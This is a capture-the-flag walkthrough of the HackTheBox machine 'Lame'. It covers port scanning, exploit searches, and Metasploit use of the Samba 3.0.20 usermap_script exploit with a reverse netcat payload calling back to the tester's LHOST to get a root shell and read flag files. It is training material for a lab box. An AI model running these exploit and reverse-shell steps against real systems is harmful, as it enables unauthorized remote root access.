Lame HackTheBox Walkthrough

In this writeup, I have demonstrated how I rooted the Lame HackTheBox Machine in very simple language. Before starting let us know something about this machine. It is a Linux machine with the difficulty level low assigned by its maker and has been assigned the IP address 10.10.10.3. This machine is retired so you will require VIP subscription at the HackThebox to access this machine.

So first of all connect your PC with hackthebox VPN and confirm your connectivity with this machine by pinging the IP address 10.10.10.3. If you are not able to ping this machine after connecting to the VPN make sure the machine is running in the lab. Start the machine first, if it is not running then ping it again. If all is correct then start with the initial enumeration on the box.

I started the enumeration by scanning the box for open ports with nmap. We scan the machine so that we can get details of various services running on the remote machine and then dig deeper into each service. This gives us a rough idea on how to proceed further for enumeration. Nmap (a well-known port scanner) gave the following results.

Scanning

$ nmap -sC -sV -oN lame_scan 10.10.10.3

Nmap scan revealed ports 21, 22, 139 and 445 are open. FTP on port 21, SSH on 22 and Samba on ports 139 & 445 are running. As we get some open ports and services running over them, our next step should be to enumerate each service in more depth using some dedicated tool for the particular service. For example, we will use $ ftp for enumerating vsftpd, $ smbmap, $ smbclient, $ enum4linux, etc tools for enumerating SMB service and so on.

vsftpd 2.3.4 service is running on port 21. So if I get any service with version number my first step is to search for known public exploits that service is vulnerable to. We can search the exploit of the particular service from exploit-db, PacketStormSecurity, and GitHub [if we have internet access during penetration testing] and in case if we don’t have internet access we can use $ searchsploit command to access the inbuilt exploit database present in Kali Linux. So, let us check if any public exploit is present for vsftpd 2.3.4. $ searchsploit tool found an exploit for this in the inbuilt Kali exploit-database.

$ searchsploit vsftpd 2.3.4 # This will search available exploits in Kali machine from inbuilt exploit-database

According to the result, vsftpd 2.3.4 has a Backdoor present in it which may have been left in the source code by some intruder during the compile time that can be used to execute commands in the remote OS where the vsftpd service is running. Also, a Metasploit module that allows Backdoor Command Execution is present in the local exploit DB.

$ msfdb run # To start metasploit-framework along with database

msf5 > search vsftpd

msf5 > use exploit/unix/ftp/vsftpd_234_backdoor

msf5 > set payload cmd/unix/interact

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

After using the exploit exploit/unix/ftp/vsftpd_234_backdoor we could not get a shell. There may be a reason that some firewall is blocking this exploit from running or admin has restricted the user from running exploits on port 21. Left it here and moved forward for further enumeration. During enumeration, we also noticed that nmap’s default script ftp-anon revealed that an anonymous login is allowed on port 21. So tried to log in anonymously using the credential anonymous : anonymous. Logged in successfully. Then tried to list folder contents but it appears that the home directory is empty. Tried to enumerate some sensitive files, data, usernames, etc but nothing was present.

$ ftp 10.10.10.3

~anonymous

~anonymous

After I could not find anything interesting on port 21 then moved forward to enumerate services that are running on the other ports. Samba 3.0.20 [an alternative to SMB service which runs on Linux] is running on port 139 & 445. So as usual, my next step is to search for the public exploit of Samba server for the given version 3.0.20.

$ searchsploit samba 3.0.20

According to the above result of searchsploit we found that samba 3.0.20 is vulnerable to username map script Command Execution, using which an attacker can execute the remote command on the server where Samba 3.0.20 is running. A Metasploit module named usermap_script is also present. After using this exploit, I got remote shell successfully.

msf5 > search usermap_script

msf5 > use exploit/multi/samba/usermap_script

msf5 > set payload cmd/unix/reverse_netcat

msf5 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.3

msf5 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.5

msf5 exploit(multi/samba/usermap_script) > exploit

We got a shell. However, the shell is not in form of shell prompt or fully qualified Linux shell. So upgraded the shell using python

Upgrading the Shell

$ which python # To check whether python is installed on remote machine

$ shell # To get a shell prompt

We have upgraded the shell. Now it is time to capture the flag.

Note: We can notice that we are root after getting shell, which means we have full permission to do anything. Moreover, our shell is root shell and we do not require privilege escalation any more.

Capture User Flag

$ cat /home/makis/user.txt

Capture Root Flag

$ cat /root/root.txt

This was how I rooted the Lame HackTheBox machine. This was an easy box. Hope you guys have liked my methodology and have learnt some new things. Share your experience with us by commenting in the below comment section. For any help & suggestions related to the walkthrough feel free to write us at [email protected].

Liked this walkthrough check out our active machine writeups at https://ethicalhacs.com/. Next upcoming walkthrough is Legacy.